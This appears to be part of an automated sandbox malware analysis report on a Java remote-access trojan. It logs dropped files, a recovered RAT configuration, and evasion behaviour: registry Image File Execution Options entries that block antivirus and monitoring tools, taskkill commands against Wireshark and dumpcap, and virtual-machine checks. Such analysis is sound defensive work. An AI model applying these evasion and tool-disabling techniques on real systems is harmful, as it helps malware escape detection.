Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\README.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt

Boot Survival

Source: C:\Windows\SysWOW64\regedit.exe Registry value created: svchost.exe
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamservice.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareTray.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdAwareDesktop.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\V3Main.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\K7EmlPxy.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\OPSSVC.EXE debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scproxysrv.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uiWatchDog.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FortiProxy.exe debugger
Source: C:\Windows\SysWOW64\regedit.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FortiClient_Diagnostic_Tool.exe debugger
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\regedit.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SUPERANTISPYWARE.EXE
Source: javaw.exe, 00000001.00000002.2962226941.000000001545B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKKILL /IM DUMPCAP.EXE /T /FF
Source: javaw.exe, 00000001.00000002.2947521616.0000000004250000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: PTASKKILL /IM DUMPCAP.EXE /T /F
Source: javaw.exe, 00000001.00000002.2947521616.0000000004250000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TASKKILL /IM DUMPCAP.EXE /T /F
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: DUMPCAP.EXE
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-1.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-multibyte-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_1.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-math-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-util-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-private-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\msvcp140_2.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\net.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-convert-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2gss.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sspi_bridge.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-synch-l1-2-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcp140.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-locale-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-process-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processenvironment-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-filesystem-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll Jump to dropped file
Source: C:\Windows\SysWOW64\xcopy.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll Jump to dropped file
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe API coverage: 1.2 %
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BDescription=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: javaw.exe, 00000001.00000002.2947521616.0000000004413000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009BF4000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.0000000009BAA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2947521616.0000000004729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Description=Microsoft Hyper-V Virtualization Infrastructure Driver
Source: java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE{
Source: java.exe, 00000004.00000002.2948370667.0000000004A45000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
